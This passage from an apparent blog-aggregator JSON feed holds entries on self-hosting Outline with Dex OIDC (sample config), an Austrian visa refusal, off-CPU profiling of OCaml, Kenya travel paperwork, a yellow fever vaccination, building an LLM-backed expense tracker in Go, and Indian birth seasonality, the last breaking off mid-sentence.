well\nNODE_ENV=production\nSECRET_KEY=your-key\nUTILS_SECRET=your-key\nDATABASE_URL=postgres:\u002F\u002Fuser:pass@postgres:5432\u002Foutline\nPGSSLMODE=disable\nREDIS_URL=redis:\u002F\u002Fredis:6379\nURL=http:\u002F\u002Flocalhost:3000\nPORT=3000\nFILE_STORAGE=local\nFILE_STORAGE_LOCAL_ROOT_DIR=\u002Fvar\u002Flib\u002Foutline\u002Fdata\nFILE_STORAGE_UPLOAD_MAX_SIZE=262144000\nOIDC_CLIENT_ID=outline\nOIDC_CLIENT_SECRET=outline-secret\nOIDC_AUTH_URI=http:\u002F\u002Flocalhost:5556\u002Fdex\u002Fauth\nOIDC_TOKEN_URI=http:\u002F\u002Fdex:5556\u002Fdex\u002Ftoken\nOIDC_USERINFO_URI=http:\u002F\u002Fdex:5556\u002Fdex\u002Fuserinfo\nOIDC_USERNAME_CLAIM=preferred_username\nOIDC_DISPLAY_NAME=Dex\nOIDC_SCOPES=openid profile email\nFORCE_HTTPS=false\nENABLE_UPDATES=true\nWEB_CONCURRENCY=1\nDEBUG=http\nLOG_LEVEL=info\nAnd finally, to configure Dex, we need the following config:\nissuer: http:\u002F\u002Flocalhost:5556\u002Fdex\n\nstorage:\n  type: sqlite3\n  config:\n    file: \u002Fvar\u002Fdex\u002Fdex.db\n\nweb:\n  http: 0.0.0.0:5556\n\nstaticClients:\n  - id: outline\n    redirectURIs:\n      - \"http:\u002F\u002Flocalhost:3000\u002Fauth\u002Foidc.callback\"\n    name: \"Outline\"\n    secret: outline-secret\n\noauth2:\n  skipApprovalScreen: true\n\nenablePasswordDB: true\n\nstaticPasswords:\n  - email: \"admin@example.com\"\n    hash: \"$2a$10$2b2cU8CPhOTaGrs1HRQuAueS7JTT5ZHsHSzYiFPm1leZck7Mc8T4W\"\n    username: \"admin\"\n    userID: \"08a8684b-db88-4b73-90a9-3cd1661f5466\"\nVoilà! With docker compose up, you’ll have an Outline server ready to go. 
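A quick note on the env variables above: the your-key placeholders for SECRET_KEY and UTILS_SECRET should be replaced with real random values before booting the stack; Outline’s sample configuration suggests generating a hex-encoded 32-byte key for each, e.g.:\nopenssl rand -hex 32\nRun it once per variable and paste the output in. 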
You can log in using the admin user.",[],{"slug":882,"title":883,"link":884,"pubDate":885,"contentSnippet":886,"tags":887,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-10","Clojuring the web application stack: Meditation One","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fclojure-web-app-from-scratch\u002Findex.html","Sat, 24 Aug 2024 00:00:00 +0000","In a land bereft of a canonical \"killer app\" web framework or two, one must think about the what, why, how, where of all the moving parts. Out here, one must become a student of web framework architecture in addition to web application architecture. For here, in Clojure-land, the two are one. ☯",[52,533,888,456,531,530,457,54],"websites",{"slug":890,"title":891,"link":892,"pubDate":893,"contentSnippet":894,"tags":895,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"austrian-visa-refusal-jan-2024","My Austrian Visa Refusal Story","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Faustrian-visa-refusal-jan-2024\u002F","Sun, 11 Aug 2024 11:59:04 +0530","Vienna - the capital of Austria - is one of the most visited cities in the world, popular for its rich history, gardens, and cafes, along with well-known figures like Beethoven, Mozart, Gödel, and Freud. It has also been consistently ranked as the most livable city in the world.\nFor these reasons, I was elated when my friend Snehal invited me last year to visit Vienna for a few days. We included Christmas and New Year’s Eve in my itinerary due to the city’s popular Christmas markets and lively events. The festive season also ensured that Snehal had some days off for sightseeing.\nIndians require a visa to visit Austria. Since the travel dates were near, I rushed to book an appointment online with VFS Global in Delhi, and quickly arranged the required documents. However, at VFS, I found out that I had applied in the wrong appointment category (tourist), which depends on the purpose of the visit, and that my travel dates did not allow enough time for the visa authorities to make a decision. Apparently, even if you plan to stay only for a part of the trip with the host, you need to apply under the category “Visiting Friends and Family”.\nThus, I had to book another appointment under this category, and took the opportunity to shift my travel dates to allow at least 15 business days for the visa application to be processed, removing Christmas and New Year’s Eve from my itinerary.\nThe process went smoothly, and my visa application was submitted by VFS. 
For reference, here’s a list of documents I submitted -\nVFS appointment letter\nDuly-filled visa application form\nOriginal passport\nCopy of passport\n1 photograph\nMy bank account statement for the past 6 months\nCover letter\nConsent form (that visa processing will take up to 15 business days)\nSnehal’s job contract\nMy work contract\nRent contract of Snehal\nResidence permit of Snehal\nA copy of Snehal’s passport\nInvitation letter from Snehal\nReturn flight ticket reservations\nTravel insurance for the intended travel dates\nThe following charges were collected from me (amounts in Indian Rupees):\nCash Handling Charge (SAC:998599): 0\nVFS Fee - India (SAC:998599): 1,820\nVISA Fee - India: 7,280\nConvenience Fee (SAC:998599): 182\nCourier Service (SAC:998599): 728\nCourier Assurance (SAC:998599): 182\nTotal: 10,192\nI later learned that the courier charges (728 INR) and the courier assurance charges (182 INR) mentioned above were optional. However, VFS didn’t ask whether I wanted to include them. When the embassy is done processing your application, it will send your passport back to VFS, from where you can either collect it yourself or get it couriered back home, which requires you to pay courier charges. However, courier assurance charges do not add any value, as VFS cannot “assure” anything about the courier, and I suggest you get them removed.\nMy visa application was submitted on the 21st of December 2023. A few days later, on the 29th of December 2023, I received an email from the Austrian embassy asking me to submit an additional document -\nSubject: AUSTRIAN VISA APPLICATION - AMENDMENT REQUEST: Ravi Dwivedi VIS 4331\nDear Applicant,\nOn 22.12.2023 your application for Visa C was registered at the Embassy. You are requested to kindly send the scanned copies of the following documents via email to the Embassy or submit the documents at the nearest VFS centre, for further processing of your application:\nKindly submit Electronic letter of guarantee “EVE- Elektronische Verpflichtungserklärung” obtained from the “Fremdenpolizeibehörde” of the sponsor’s district in Austria. Once your host company\u002Finviting company has obtained the EVE, please share the reference number (starting from DEL_____) received from the authorities, with the Embassy.\nI misunderstood the required document (the EVE) to be a scanned copy of the letter of guarantee form signed by Snehal, and responded by attaching it.\nUpon researching, Snehal determined that the document is an electronic letter of guarantee, and is supposed to be obtained at a local police station in Vienna. He visited a police station the next day and had a hard time conversing due to the language barrier (German is the common language in Austria, whereas Snehal speaks English). 
It was the weekend, so he booked an appointment for Monday, but in the meantime the embassy had finished processing my visa.\nMy visa was denied, and the refusal letter stated:\nThe Austrian embassy in Delhi examined your application; the visa has been refused.\nThe decision is based on the following reason(s):\nThe information submitted regarding the justification for the purpose and conditions of the intended stay was not reliable.\nThere are reasonable doubts as to your intention to leave the territory of the Member States before the expiry of the visa.\nOther remarks:\nYou have been given an amendment request, which you have failed to fulfil, or have only fulfilled inadequately, within the deadline set.\nYou are a first-time traveller. The social and economic roots with the home country are not evident. The return from Schengen territory does therefore not seem to be certain.\nI could have reapplied after obtaining the EVE, but I didn’t: I found the following line\nThe social and economic roots with the home country are not evident.\noffensive for someone who was born and raised in India; I got the impression that the absence of the electronic guarantee letter was not the only reason behind the refusal; I had already wasted 12,000 INR on this application; and my friend’s stay in Austria was uncertain after January. In fact, my friend soon returned to India.\nTo summarize -\nIf you are visiting a host, then the category of appointment at VFS must be “Visiting Friends and Family” rather than “Tourist”.\nVFS charged me for courier assurance, which is an optional service. Make sure to get these charges removed from your bill.\nNeither my travel agent nor the VFS application center mentioned the EVE.\nWhile the required documents list from the VFS website does mention it in point 6, it leads to a dead link.\nSnehal informed me that a mere two months ago, his wife’s visa was approved without an EVE. This hints at inconsistent processing of applications, even those under identical categories.\nSuch incidents are a waste of time and money for applicants, and an embarrassment to VFS and the Austrian visa authorities. I suggest that the Austrian visa authorities fix that URL, and provide instructions for hosts to obtain the EVE.\nCredits to Snehal and Contrapunctus for editing, Badri for proofreading.",[],{"slug":897,"title":898,"link":899,"pubDate":900,"contentSnippet":901,"tags":902,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"offcputime-analysis","Off-CPU-time analysis","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Foffcputime\u002Fbpfcc\u002F2024\u002F07\u002F24\u002Foffcputime-analysis\u002F","2024-07-24T09:48:00.000Z","Off-CPU analysis records and analyses a program’s behavior while it is\nnot running. See Brendan Gregg’s eBPF based off-CPU\nanalysis. While on-CPU\nperformance monitoring tools such as perf give you an idea of where the\nprogram is actively spending its time, they won’t tell you where the program\nis spending time blocked waiting for an action. Off-CPU analysis reveals\ninformation about where the program is spending time passively.\nInstallation\nInstall the tools from https:\u002F\u002Fgithub.com\u002Fiovisor\u002Fbcc\u002F.\nEnabling frame pointers\nThe off-CPU stack trace collection, offcputime-bpfcc, requires the programs to\nbe compiled with frame pointers for full backtraces.\nOCaml\nFor OCaml, you’ll need a compiler variant with frame pointers enabled. 
If you are installing a released compiler using opam, you can create one\nwith the following switch command: opam switch create 5.2.0+fp 5.2.0 ocaml-option-fp.\nSwap out 5.2.0 for your preferred OCaml version.\nAlternatively, if you are building the OCaml compiler from source, configure the\ncompiler with the --enable-frame-pointers option:\n\n$ .\u002Fconfigure --enable-frame-pointers\n\n\nLastly, there is an option to create an opam switch with the development branch\nof the compiler. The instructions are in ocaml\u002FHACKING.adoc. In order to\ncreate an opam switch from the current working directory, do:\n\n$ opam switch create . 'ocaml-option-fp' --working-dir\n\n\nglibc\nThe libc is not compiled with frame pointers by default. This will lead to many\ntruncated stack traces. On Ubuntu, I did the following to get a glibc with frame\npointers enabled:\nInstall glibc with frame pointers\n    \n\n$ sudo apt install libc6-prof\n\n    \nLD_PRELOAD the glibc with frame pointers\n    \n\n$ LD_PRELOAD=\u002Flib\u002Flibc6-prof\u002Fx86_64-linux-gnu\u002Flibc.so.6 .\u002Fmyapp.exe\n\n    \nRunning\nOn one terminal run the program that you want to analyze:\n\n$ LD_PRELOAD=\u002Flib\u002Flibc6-prof\u002Fx86_64-linux-gnu\u002Flibc.so.6 .\u002Focamlfoo.exe\n\n\nOn another terminal run the offcputime-bpfcc tool:\n\n$ sudo offcputime-bpfcc --stack-storage-size 2097152 -p $(pgrep -f ocamlfoo.exe) 10 > offcputime.out\n\n\nThe command watches the process for 10s and then writes out the stack traces\ncorresponding to blocking calls to offcputime.out. We use a large stack\nstorage size argument so as to not lose stack traces. Otherwise, you will see\nmany [Missing User Stack] errors in the back traces.\nCaveats\noffcputime-bpfcc must run a few seconds longer than the program being\ninstrumented so that the function symbols are resolved. Otherwise you may see\n[unknown] in the backtrace for function names.\nOddities\nI still see an order of magnitude difference between the maximum pauses observed\nusing offcputime-bpfcc and olly trace. Something is off.\nOther links\nhttps:\u002F\u002Fwww.pingcap.com\u002Fblog\u002Fhow-to-trace-linux-system-calls-in-production-with-minimal-impact-on-performance\u002F",[],{"slug":904,"title":905,"link":906,"pubDate":907,"contentSnippet":908,"tags":909,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"on-software-as-an-indiscipline","On software as an \"in-discipline\"","https:\u002F\u002Fnadh.in\u002Fblog\u002Fon-software-as-an-indiscipline\u002F","Wed, 24 Jul 2024 00:00:00 +0000","The nth-order effects of the recent CrowdStrike fiasco [1][2][3] will unfold over time. 
As it stands, it is apparently the single biggest global “tech outage” ever, which has already disrupted everything from airlines to railways to hospitals to financial systems, amongst numerous others—globally.",[],{"slug":911,"title":912,"link":913,"pubDate":914,"contentSnippet":915,"tags":916,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"it-admins-battle-windows-blue-screen-of-death-after-faulty-update","IT Admins Battle Windows Blue Screen of Death After Faulty Update","https:\u002F\u002Fibcomputing.com\u002Fit-admins-battle-windows-blue-screen-of-death-after-faulty-update\u002F","Fri, 19 Jul 2024 22:44:17 +0000","How IT Admins Are Fixing the Windows Blue Screen of Death IT administrators worldwide are in crisis mode today due to a major issue with … \nThe post IT Admins Battle Windows Blue Screen of Death After Faulty Update appeared first on IB Computing.",[13],{"slug":918,"title":919,"link":920,"pubDate":921,"contentSnippet":922,"tags":923,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"googles-goo-gl-link-shortener-expire-in-aug-2025","Google’s Goo.gl Link Shortener Expire in Aug 2025","https:\u002F\u002Fibcomputing.com\u002Fgoogles-goo-gl-link-shortener-expire-in-aug-2025\u002F","Fri, 19 Jul 2024 22:30:54 +0000","Google’s Goo.gl link shortener expires in Aug 2025. Hold onto your hyperlinks, folks! Google’s Goo.gl link shortener expires soon; it is officially nearing the end … \nThe post Google’s Goo.gl Link Shortener Expire in Aug 2025 appeared first on IB Computing.",[13],{"slug":925,"title":926,"link":927,"pubDate":928,"contentSnippet":929,"tags":930,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"wikipedia-launches-long-awaited-dark-mode-feature","Wikipedia Launches Long-Awaited Dark Mode Feature","https:\u002F\u002Fibcomputing.com\u002Fwikipedia-launches-long-awaited-dark-mode-feature\u002F","Thu, 18 Jul 2024 21:43:01 +0000","Dark Mode Finally Arrives After years of anticipation, Wikipedia introduces dark mode, now available on select wikis for both mobile and desktop in reading and … \nThe post Wikipedia Launches Long-Awaited Dark Mode Feature appeared first on IB Computing.",[13,931,932],"dark mode","wikipedia",{"slug":934,"title":935,"link":936,"pubDate":937,"contentSnippet":938,"tags":939,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kenya-visa-process","Kenya Visa Process","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkenya-visa-process\u002F","Sun, 14 Jul 2024 16:24:02 +0530","Prior to arrival in Kenya, you need to apply for an Electronic Travel Authorization (eTA) on their website by uploading all the required documents. This system has been in place since Jan 2024, after the country abolished the visa system. The required documents will depend on the purpose of your visit, which, in my case, was to attend a conference.\nHere is the list of documents I submitted for my eTA:\nScanned copy of my passport\nPhotograph with white background\nFlight tickets (reservation)\nHotel bookings (reservation)\nInvitation letter from the conference\nYellow Fever vaccination certificate (optional)\nJob contract (optional)\n“Reservation” means I didn’t book the flights and hotels, but rather reserved them. Additionally, “optional” means that those documents were not mandatory to submit, but I submitted them in the “Other Documents” section in order to support my application. 
After submitting the eTA, I had to make a payment of around 35 US Dollars (approximately 3000 Indian Rupees).\nIt took 40 hours for me to receive an email from Kenya stating that my eTA had been approved, along with an attached PDF, making this one of my smoothest experiences of obtaining travel documents :). An eTA is technically not a visa, but I put the word “visa” in the title due to familiarity with the term.",[],{"slug":941,"title":942,"link":943,"pubDate":944,"contentSnippet":945,"tags":946,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-11","Poor man's job runner with Clojure Agents","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fpoor-mans-job-runner-clojure-agents\u002Findex.html","Sun, 14 Jul 2024 00:00:00 +0000","On (mis)using Clojure's concurrency features to make an in-memory job runner, because I needed an excuse to use more than atoms for once. Definitely not Rich Hickey's \"Ants\" demo.",[49,456,52,533],{"slug":948,"title":949,"link":950,"pubDate":951,"contentSnippet":952,"tags":953,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"yellow-fever-vaccine","Yellow Fever Vaccine","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fyellow-fever-vaccine\u002F","Sat, 13 Jul 2024 13:26:03 +0530","Recently, I got vaccinated with the yellow fever vaccine, as I am planning to travel to Kenya, a high-risk country for yellow fever, in the near future. It should be taken at least 10 days before entering areas with yellow fever transmission, to provide enough time for the formation of antibodies. In order to get vaccinated, I searched for vaccination centers in Delhi and stumbled upon this page by the Indian government, which lists vaccination centers for yellow fever all over India. From that list, I made a phone call to the Airport Health Organization, a vaccination center near the Delhi Airport.\nThey asked me to write an email stating that I need yellow fever vaccination. After I sent the email, they prompted me to attach a scanned copy of my passport data page; once I sent it, they emailed me my appointment date, asking me to pay 300 INR in advance, along with other instructions. The appointment date was 4 days after I sent the scanned copy of my passport. The email also mentioned that those who are allergic to eggs or have never eaten eggs should instead visit RML Hospital.\nThe vaccination center must be visited between 10 AM and 12 noon on the date of appointment. I reached there at around 11 AM and got vaccinated in around 40 minutes, followed by obtaining a vaccine certificate in half an hour.\nOne dose of this vaccine gives immunity against yellow fever for life. Therefore, I can travel to any country with yellow fever transmission after getting this dose, although some countries may require proof of vaccination within some time frame, and some people might need a booster dose to maintain immunity.",[],{"slug":955,"title":956,"link":957,"pubDate":958,"contentSnippet":959,"tags":960,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"thinking","Thinking...","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fthinking\u002F","Mon, 08 Jul 2024 15:49:50 +0000","It’s late, I am sitting in my chair with my laptop in my lap, a drizzle of rain is falling outside and I can hear constant plunk plunk plunk sounds of the rain hitting the floor, a cool breeze is running through my room. 
A table fan is running, pointing away from me because otherwise it feels too cold.\nI sit while I think about the world around me. That’s what I do when I am bored: I marvel at the world, its enormity and beauty.",[],{"slug":962,"title":963,"link":964,"pubDate":965,"contentSnippet":966,"tags":967,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"living-offgrid","Living Off-grid","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fliving-offgrid\u002F","Fri, 14 Jun 2024 09:19:34 +0000","Infrastructure is fascinating, at least to me. Recently I have been reading up about the infrastructure required for research at the South Pole. A lot of the things which we take for granted while we carry out our daily lives are not readily available there. The average annual temperature is around -49°C, which means that water in liquid form is not available. Instead, they pump heated water into a structure called a Rodwell, which forms an underground lake of water; the heated water is continuously pumped into it through insulated pipes to ensure that it does not freeze.",[],{"slug":969,"title":970,"link":971,"pubDate":972,"contentSnippet":973,"tags":974,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gullak","Building an expense tracker app","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgullak\u002F","2024-06-14T00:00:00.000Z","A couple of weeks ago, I decided to start logging and tracking my expenses. The goal was not to record every minor purchase but to gain a general insight into where my money was going. In this post, I’ll dive deep into the behind-the-scenes of building Gullak—an expense tracker app with a dash of AI (yes).\n\n\n\nWhy#\nMy wife and I have a simple system for tracking our expenses during trips: we use Apple Notes to maintain a day-wise record, jotting down a one-liner for each expense under the date. This straightforward method has proven effective in keeping tabs on our spending habits while traveling.\nFor instance, during our last Europe trip, we recorded our daily expenses. After returning home, I was eager to analyze our spending patterns. I copied all these items into Google Sheets to analyse the top categories that I spent on during the trip.\n\nI decided to develop a simple expense tracker app that automatically categorizes expenses into various groups like food, travel, shopping, etc. I believed this was a practical use case for leveraging an LLM paired with function calling to parse and categorize expenses.\nInitial Prototype#\nThe first step involved designing a prompt to capture user input about their spending. I picked up the go-openai library and experimented with it.\nAlmost a year ago, I had developed a small bot for personal use, which provided a JSON output detailing the macronutrients and calories in specific food items, storing this information in Metabase. However, this was during the early days of API access provided by OpenAI. 
Due to occasionally unsatisfactory and inconsistent responses (despite instructions like “MUST RETURN JSON OR 1000 CATS WILL D*E SOMEWHERE”), it wasn’t entirely reliable.\nFunction calling addresses two main limitations of traditional language model responses:\nInconsistent response format: Without function calling, responses from language models can be unstructured and inconsistent, requiring complex validation and parsing logic on the application side.\nLack of external data integration: Language models are typically limited to the knowledge they were trained on, making it challenging to provide answers based on real-time or external data.\nIt’s important to note that the LLM does not actually execute any functions. Rather, we create a structure for the LLM to follow in its responses. The LLM would then generate a response with the content as a stringified JSON object following the schema provided in the function definition.\nI created a function called categorize_expense. This function takes a list of transactions as parameters, with each transaction having properties like transaction_date, amount, category, and description.\nHere’s what this looks like:\nfnCategorizeExpenses := openai.FunctionDefinition{\n  Name:        \"categorize_expense\",\n  Description: \"Categorize expenses from the given input.\",\n  Parameters: jsonschema.Definition{\n    Type: jsonschema.Object,\n    Properties: map[string]jsonschema.Definition{\n      \"transactions\": {\n        Type:        jsonschema.Array,\n        Description: \"List of items purchased\",\n        Items: &jsonschema.Definition{\n          Type: jsonschema.Object,\n          Properties: map[string]jsonschema.Definition{\n            \"transaction_date\": {\n              Type:        jsonschema.String,\n              Description: \"Date of transaction in ISO 8601 format (e.g., 2021-09-01) if specified else today's date.\",\n            },\n            \"amount\": {\n              Type:        jsonschema.Number,\n              Description: \"Amount of the item\",\n            },\n            \"category\": {\n              Type:        jsonschema.String,\n              Description: \"One word category of the expense (e.g., food, travel, entertainment)\",\n            },\n            \"description\": {\n              Type:        jsonschema.String,\n              Description: \"Concise and short description of the item\",\n            },\n          },\n          Required: []string{\"transaction_date\", \"amount\", \"category\", \"description\"},\n        },\n      },\n    },\n    Required: []string{\"transactions\"},\n  },\n}\nThe response from this API call can then be unmarshalled into a struct.\nvar transactions models.Transactions\n\nif err := json.Unmarshal([]byte(toolCall.Function.Arguments), &transactions); err != nil {\n    return err\n}\nThe next step was to determine exactly how users would provide input. I considered various methods that would make entering expenses as straightforward as my approach with Apple Notes and decided to create a Telegram bot.\n\nI developed a Telegram bot that would parse the expenses and save them to a SQLite database. I explored tools like evidence.dev, a nice platform for creating frontends using the database as the sole source of truth. However, I encountered an issue where it could not correctly parse date values (see GitHub issue). 
Ultimately, I returned to my reliable old friend—Metabase.\nHowever, I faced two main challenges with this approach:\nPrivacy Concerns: Telegram does not offer the option to create a private bot; all bots generated through BotFather are public. To restrict access, I considered adding session tokens, but this approach was unsatisfactory. If I planned to distribute this bot, implementing a token-based, DIY authentication system on Telegram did not seem appropriate.\nFixing Bad Entries: To correct erroneous entries, I had to manually update the SQLite table. As I intended to share this bot with my wife, I needed a more user-friendly workflow; manually raw dogging UPDATE SQL queries was not it.\nAfter a day or two of experimenting, I decided to build a small frontend for now.\nBuilding Frontend#\n\nAs a backend developer, my core expertise is NOT JavaScript, and I strongly dislike the JS ecosystem. Obviously there’s no dearth of choices when it comes to frameworks; however, for this project I wanted to stay away from the hype and choose a stack that is simple to use and productive (for me) out of the box. Having used Vue.js in production in the past, I feel it ticks those boxes for me as it comes bundled with a router, store, and all the niceties, and it has excellent documentation. After reading a refresher on the new Vue3 composition API syntax, I hit the ground running.\nI find Tailwind CSS ideal for someone like me who prefers not to write CSS or invent class names. It’s a heavily debated topic online, but it’s important to pick our battles. An issue I encountered while researching UI frameworks was that Vue.js seems to have fewer options compared to React, likely due to its lower popularity. After some google-fu, I discovered a promising project called shadcn-vue, an unofficial community-led port of the shadcn\u002Fui React library.\nThe cool thing about this library is that it doesn’t come bundled as a package, meaning there’s no way to install it as a dependency. Instead, it gets added directly to your source code, encouraging you to tweak it the way you like.\nI believe it’s an excellent starting point for anyone looking to build their own design system from scratch, as it allows for customization of both appearance and behavior. It might have been overkill for my simple UI, but I thought, what the heck, if side projects aren’t for exploring new things, what’s the point of it all? 😄\nDatabase#\nFor the database, I opted for SQLite. It’s perfect for a small project like this since the database is just a single file, making it easier to manage. Initially, I used the popular driver mattn\u002Fgo-sqlite3, but I found that the CGO-free alternative modernc\u002Fsqlite works just as well.\nI also experimented with sqlc for the first time. For those unfamiliar, sqlc generates type-safe Go code from your raw SQL queries. It handles all the boilerplate database code needed to retrieve results, scan them into a model, manage transactions, and more. sqlc makes it seem like you’re getting the best of both worlds (ORM + raw SQL).\nHere’s an example query:\n-- name: CreateTransaction :many\n-- Inserts a new transaction into the database.\nINSERT INTO transactions (created_at, transaction_date, amount, currency, category, description, confirm)\nVALUES (?, ?, ?, ?, ?, ?, ?)\nRETURNING *;\nRunning sqlc generate produces the following code:\n\u002F\u002F Code generated by sqlc. 
DO NOT EDIT.\n\u002F\u002F versions:\n\u002F\u002F   sqlc v1.26.0\n\u002F\u002F source: queries.sql\n\npackage db\n\nimport (\n\t\"context\"\n\t\"database\u002Fsql\"\n\t\"time\"\n)\n\nconst createTransaction = `-- name: CreateTransaction :many\nINSERT INTO transactions (created_at, transaction_date, amount, currency, category, description, confirm)\nVALUES (?, ?, ?, ?, ?, ?, ?)\nRETURNING id, created_at, transaction_date, currency, amount, category, description, confirm\n`\n\ntype CreateTransactionParams struct {\n\tCreatedAt       time.Time `json:\"created_at\"`\n\tTransactionDate time.Time `json:\"transaction_date\"`\n\tAmount          float64   `json:\"amount\"`\n\tCurrency        string    `json:\"currency\"`\n\tCategory        string    `json:\"category\"`\n\tDescription     string    `json:\"description\"`\n\tConfirm         bool      `json:\"confirm\"`\n}\n\n\u002F\u002F Inserts a new transaction into the database.\nfunc (q *Queries) CreateTransaction(ctx context.Context, arg CreateTransactionParams) ([]Transaction, error) {\n\trows, err := q.query(ctx, q.createTransactionStmt, createTransaction,\n\t\targ.CreatedAt,\n\t\targ.TransactionDate,\n\t\targ.Amount,\n\t\targ.Currency,\n\t\targ.Category,\n\t\targ.Description,\n\t\targ.Confirm,\n\t)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\titems := []Transaction{}\n\tfor rows.Next() {\n\t\tvar i Transaction\n\t\tif err := rows.Scan(\n\t\t\t&i.ID,\n\t\t\t&i.CreatedAt,\n\t\t\t&i.TransactionDate,\n\t\t\t&i.Currency,\n\t\t\t&i.Amount,\n\t\t\t&i.Category,\n\t\t\t&i.Description,\n\t\t\t&i.Confirm,\n\t\t); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\titems = append(items, i)\n\t}\n\tif err := rows.Close(); err != nil {\n\t\treturn nil, err\n\t}\n\tif err := rows.Err(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn items, nil\n}\nApple Shortcuts#\nSimilar to my Apple Notes approach, I wanted to create a shortcut that would allow me to log expenses quickly. I created a simple shortcut that would prompt me to enter the expenses and send an HTTP POST request to Gullak’s API server. I then open the dashboard once in a while to confirm\u002Fedit these unconfirmed transactions.\nYou can read more about setting up the Shortcut on your Apple devices here.\nProudly, Not a Weekend Project#\nFor every “I could do this in a weekend” comment, yes, this project is straightforward—a “CRUD GPT” wrapper that isn’t complicated to build. Yet, it took me over a month to develop. I spent less than an hour most days on this project, instead of cramming it into an all-nighter weekend project - an approach I want to move away from. Slow and steady efforts compound, outlasting quick, sporadic bursts. I’m pleased to balance this with my full-time job without burning out.\nIdeas for the Future#\nInitially, I didn’t set out to build a comprehensive budgeting app, just an expense logger, as that was my primary need. However, if usage increases and the tool proves helpful in reducing unnecessary spending, I’m open to adding more features. Some possibilities include a subscription tracker, integration with budgeting tools like YNAB or Actual through their APIs, and monthly reports sent via email. The best part is that you fully own your data: it is stored locally on your device, so you can export it anytime and build other integrations on top of it.\nFeel free to open a GitHub issue or reach out if you have any suggestions or feedback. 
I’m excited to see where this project goes!\nUpdate (Feb 2026)#\nI’ve rewritten Gullak to use plain-text ledger files. Read more about why in the follow-up post: Why Plain-Text Ledger is Powerful for Gullak.",[],{"slug":976,"title":977,"link":978,"pubDate":979,"contentSnippet":980,"tags":981,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"augustbirthdays","Why are there so many birthdays in August?","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2024\u002F04\u002F28\u002Faugustbirthdays\u002F","2024-04-27T18:30:00.000Z","One of my fond memories while growing up in Rawatbhata, a small town (and now a city!) in Rajasthan, was birthday parties. These birthday parties used to be simple. We were all a bunch of similar-aged kids and would just invite each other for a mini celebration.\nEverything about these parties was simple. The people were simple. The invitation was simple - you visited each house and verbally invited everyone. The food was simple. There were no starters; a couple of large bottles of Thums Up would suffice and were often served in steel glasses which would come out just for this occasion. There was only one simple course - the main course with pulao (rice + sautéed veggies), poori (fried flatbread), dessert (gulab jamun or kheer), chole (chickpeas), and well, a piece of cake. Paneer had not entered the menu yet, though it was sometimes on the menu if you were invited home for dinner.\nThe music was simple and the dance was simple. Bollywood’s top four dance numbers would play on a loop from a Philips cassette player that everyone had. It was available at a discount for everyone, or so I recall. And yes, there were simple “return gifts” - a Nataraj pencil and a Non-dust eraser. Simple times.\n\nThere were no bakeries in Rawatbhata for a long time, and almost all cakes were home-baked. No one in the town had ovens! There were no microwaves either. The only electrical gadget in the kitchen used to be a mixer grinder. How do you “bake” without an “oven”? The technique uses a simple idea - use sand to provide controlled heating. Too much digression. But the cakes were simple too.\n\nBaking the cake on sand and stove! Source\n\nWhile we would get invited to all the birthdays, I do remember sneaking in uninvited to a few, once in a while. I also distinctly remember August being a month of celebrations. Of course, there was Independence Day on the 15th, lined up with five birthdays in August! Five! Most other months would have one or two. Naturally, August was also my favourite month - loads of good food and return gifts. People with birthdays in August had to be extra diligent. While the simple birthday menu rarely changed, the “return gifts” required deeper thought. You did not want to be called out for repeating a return gift in the same month.\nCaught in the nostalgia of food, birthdays, and 90s music, I had a question going around in my head: Were the five birthdays in August a rare event? There are 365 days in a year, and assuming no day is special, there is no reason August should be a non-simple birthday month. How do I find out if there is anything special about August, if there is? My first thought was to poll my odd group of college friends and ask them for their birthdays. However hard I try to avoid it, this would be a convenience sample, and I don’t think I would have learned anything mechanistic about the “why” or “how”.\nWhat do I need to answer my question? 
My question can be asked more simply: when do most Indians celebrate their birthdays? If I had access to all the Aadhaar data, this question could probably be answered with a few lines of code. Aadhaar is of course closed for these use cases. A little bit of searching landed me on a wonderful resource: HMIS. The description on the website is self-explanatory:\nThis portal will be a gateway to wealth of information regarding the health indicators of India. The information available on this portal is derived data from data uploaded by the States\u002F UTs. HMIS data is specifically designed to support planning, management, and decision making based on Grading of facilities, various indicators at Block, District at State as well as National Level.\nWhile the emphasis is on “health indicators”, HMIS has district and state-level data on how many births happen in private and public hospitals. Getting this data was quite an exercise and taught me several tricks for parsing Excel\u002FHTML. After struggling disproportionately with weirdly formatted files, I could extract all the birth data between 2008 and 2020 across states. With this data in hand, I could finally answer the simple question: was August the special birthday month?\nI first looked at the distribution of births. September, October, and August have the highest number of births, with approximately 1.9 million average births over 2008-2020. Since births peak in these months, there is an inherent “seasonality” attached to birthdays in India. In a hypothetical world, all the months would have roughly equal births, rather than having a range from 1.38 million births (April) to 1.98 million births 